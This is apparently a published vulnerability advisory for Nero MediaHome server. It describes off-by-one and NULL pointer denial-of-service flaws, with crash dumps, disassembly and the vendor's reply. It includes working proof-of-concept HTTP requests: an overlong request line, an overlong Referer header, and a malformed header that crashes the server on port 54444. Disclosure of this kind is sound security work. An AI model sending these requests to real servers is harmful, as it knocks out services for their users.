Total Tests:

Nero MediaHome Multiple Remote DoS Vulnerabilities

Advisory ID:HTB23130
Product:Nero MediaHome
Vulnerable Versions: and probably prior
Tested Version: in Windows 7 SP1
Advisory Publication:November 21, 2012 [without technical details]
Vendor Notification:November 21, 2012
Public Disclosure:January 9, 2013
Latest Update:January 30, 2013
Vulnerability Type:Off-by-One Error [CWE-193]
NULL Pointer Dereference [CWE-476]
CVE References:CVE-2012-5876
Risk Level:Low
CVSSv2 Base Scores:3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P)
3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P)
Discovered and Provided:1) High-Tech Bridge Security Research Lab
2) Risk Based Security

Advisory Details:

High-Tech Bridge Security Research Lab has discovered multiple DoS vulnerabilities in Nero Media Home server, which could be exploited by a malicious person to crash the server remotely.

1) Off-by-one errors in Nero MediaHome server: CVE-2012-5876
1.1 The vulnerability exists due to an off-by-one error in NMMediaServerService.dll when handling HTTP requests with overly long request lines. A remote attacker can send multiple HTTP requests with request line of at least 135 168 characters long to port 54444/TCP (Nero MediaHome server's default port) and cause immediate crash of Nero MediaHome server.
Crash details:
EIP: 7c921689 mov ecx,[ecx]
EAX: 03b2a808 ( 62040072) -> (heap)
EBX: 003e0000 ( 4063232) -> b@>@>" (heap)
ECX: 00000000 ( 0) -> N/A
EDX: 00000000 ( 0) -> N/A
EDI: 03b2b000 ( 62042112) -> D (heap)
ESI: 03b2a800 ( 62040064) -> (heap)
EBP: 0526f854 ( 86440020) -> &|&B>>D&$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>.D. (stack)
ESP: 0526f848 ( 86440008) -> >">&|&B>>D&$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>. (stack)
+00: 003e0000 ( 4063232) -> b@>@>" (heap)
+04: 00000022 ( 34) -> N/A
+08: 003e0004 ( 4063236) -> b@>@>" (heap)
+0c: 0526f88c ( 86440076) -> &$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>.D. D&|>|>|h& (stack)
+10: 7c928ccd (2089979085) -> N/A
+14: 00000000 ( 0) -> N/A

Disasm around:
0x7c921664 mov ecx,[ebp+0x10]
0x7c921667 add eax,[ecx]
0x7c921669 cmp eax,0xfe00
0x7c92166e ja 0x7c920721
0x7c921674 cmp byte [ebp+0x14],0x0
0x7c921678 jnz 0x7c95ae10
0x7c92167e mov ecx,[esi+0xc]
0x7c921681 lea eax,[esi+0x8]
0x7c921684 mov edx,[eax]
0x7c921686 mov [ebp+0x8],ecx
0x7c921689 mov ecx,[ecx]
0x7c92168b cmp ecx,[edx+0x4]
0x7c92168e mov [ebp+0xc],edx
0x7c921691 jnz 0x7c921734
0x7c921697 cmp ecx,eax
0x7c921699 jnz 0x7c921734
0x7c92169f push esi
0x7c9216a0 push ebx
0x7c9216a1 call 0x7c920684
0x7c9216a6 mov eax,[ebp+0xc]
0x7c9216a9 mov ecx,[ebp+0x8]

Proof of Concept:
The following HTTP request, sent a number of times, will crash the vulnerable Nero MediaHome server:
GET /[A * 135168 or more] HTTP/1.1
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None

1.2 The vulnerability exists due insufficient validation of HTTP request header values in NMMediaServer.dll. A remote attacker can send a specially crafted HTTP request containing an overly long header value (at least 135 168 characters long) to port 54444/TCP, cause a heap-based buffer overflow and crash the vulnerable application.
Crash details:
EIP: 7c920a19 mov ecx,[ecx]
EBX: 003e0000 ( 4063232) -> Tp@>+ (heap)
ECX: 41414141 (1094795585) -> N/A
EDX: 41414141 (1094795585) -> N/A
EDI: 03c1af88 ( 63025032) -> B>VTP/1.1Host localhostUser-Agent Mozilla/5.0 (Windows; U)Accept-Language en-us,en;q=0.5Keep-AliB (heap)
EBP: 0527f828 ( 86505512) -> `' (stack)
ESP: 0527f81c ( 86505500) -> >!>`'|VAAAAT'A>>B'$|>pgg|' |(|"|||>"|>><'' |(|"||x>'><' | (stack)
+00: 003e0000 ( 4063232) -> Tp@>+ (heap)
+04: 00000021 ( 33) -> N/A
+08: 003e0004 ( 4063236) -> Tp@>+ (heap)
+0c: 0527f860 ( 86505568) -> '$|>pgg|' |(|"|||>"|>><'' |(|"||x>'><' |>@'X`4' |`| (stack)
+10: 7c928ccd (2089979085) -> N/A
+14: 03ad5600 ( 61691392) -> >8*W=>@ 3:X`DS.MetaData.OriginalStreamNumber0[Jp (heap)

Disasm around:
0x7c9209f8 jnz 0x7c95af5f
0x7c9209fe mov al,[esi+0x5]
0x7c920a01 and al,0x10
0x7c920a03 test al,0x10
0x7c920a05 mov [edi+0x5],al
0x7c920a08 jnz 0x7c920aa0
0x7c920a0e mov ecx,[esi+0xc]
0x7c920a11 lea eax,[esi+0x8]
0x7c920a14 mov edx,[eax]
0x7c920a16 mov [ebp+0xc],ecx
0x7c920a19 mov ecx,[ecx]
0x7c920a1b cmp ecx,[edx+0x4]
0x7c920a1e mov [ebp+0x14],edx
0x7c920a21 jnz 0x7c921752
0x7c920a27 cmp ecx,eax
0x7c920a29 jnz 0x7c921752
0x7c920a2f push esi
0x7c920a30 push ebx
0x7c920a31 call 0x7c920684
0x7c920a36 mov eax,[ebp+0x14]
0x7c920a39 mov ecx,[ebp+0xc]

Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Connection: keep-alive
Referer:[A * 265566]

2) NULL pointer dereference in Nero MediaHome server: CVE-2012-5877
2.1 The vulnerability exists due to a NULL pointer dereference error when handling HTTP request with missing HTTP header name. A remote attacker can send a specially crafted HTTP request with missing HTTP header name and crash Nero MediaHome server.
Crash details:
EIP: 10003171 mov [eax+0x18],ebp
EAX: 00000000 ( 0) -> N/A
EBX: 037bd090 ( 58445968) -> x4xx @R px?x? (heap)
ECX: 039cddea ( 60612074) -> localhost (heap)
EDX: 039cddea ( 60612074) -> localhost (heap)
EDI: 037bc888 ( 58443912) -> ||{sP@OQ6E}{AY+ (heap)
ESI: 037c7fb0 ( 58490800) -> `?|`?LPCMH|faudio/l16a| ||MP3| (heap)
EBP: 00000009 ( 9) -> N/A
ESP: 0563fad0 ( 90438352) -> {s|~{x`)huc1P3quhucuthucuyuuhuhucuuM|$cVhx (stack)
+00: 037bd090 ( 58445968) -> x4xx @R px?x? (heap)
+04: 039cdde8 ( 60612072) -> localhostUser-Agent: Mozilla/5.0 (Windows; U)Accept-Language: en-us,en;q=0.5Keep-Alive: 300Connection: keep-aliveReferer: (heap)
+08: 00000000 ( 0) -> N/A
+0c: 00000001 ( 1) -> N/A
+10: 000000b8 ( 184) -> N/A
+14: 037c7318 ( 58487576) -> hhuA_ARG_TYPE_Result7$*pb$ (heap)

Disasm around:
0x10003156 mov edx,[esi+0x8]
0x10003159 mov ebp,[esi+0xc]
0x1000315c push byte 0x1
0x1000315e push eax
0x1000315f push ecx
0x10003160 push ebx
0x10003161 mov [edi+0x40],esi
0x10003164 mov [esp+0x2c],edx
0x10003168 call 0x10002730
0x1000316d mov ecx,[esp+0x2c]
0x10003171 mov [eax+0x18],ebp
0x10003174 mov ebp,[esp+0x24]
0x10003178 add esp,0x10
0x1000317b mov [eax+0x14],ecx
0x1000317e mov edx,[ebp+0x8]
0x10003181 test edx,edx
0x10003183 mov [esp+0x14],edx
0x10003187 jnz 0x10002ff0
0x1000318d mov eax,[esp+0x24]
0x10003191 push eax
0x10003192 call 0x10002c20

Proof of Concept:
The following HTTP request will crash Nero MediaHome server remotely:
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Connection: keep-alive

How to Detect Off-by-One Error Vulnerabilities
Website Security Test
  • GDPR & PCI DSS Test
  • Website CMS Security Test
  • CSP & HTTP Headers Check
  • WordPress & Drupal Scanning
Try For Free

Vendor last response (January 9, 2013):
"Nero Media Home 4 is not maintained anymore since 2009/10 so at the moment we do not have the resources to fix this problem very soon."

As a temporary solution it is advised to remove the vulnerable application from your system.

[1] High-Tech Bridge Advisory HTB23130 - - Nero MediaHome Server Multiple Remote DoS vulnerabilities.
[2] Nero - - Nero MediaHome server easily distributes music, videos and photos over your network.
[3] Common Vulnerabilities and Exposures (CVE) - - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Book a Call Ask a Question
Talk to ImmuniWeb Experts
ImmuniWeb AI Platform
Have a technical question?

Our security experts will answer within
one business day. No obligations.

Have a sales question?
Tel: +41 22 560 6800 (Switzerland)
Tel: +1 720 605 9147 (USA)
Your data will stay private and confidential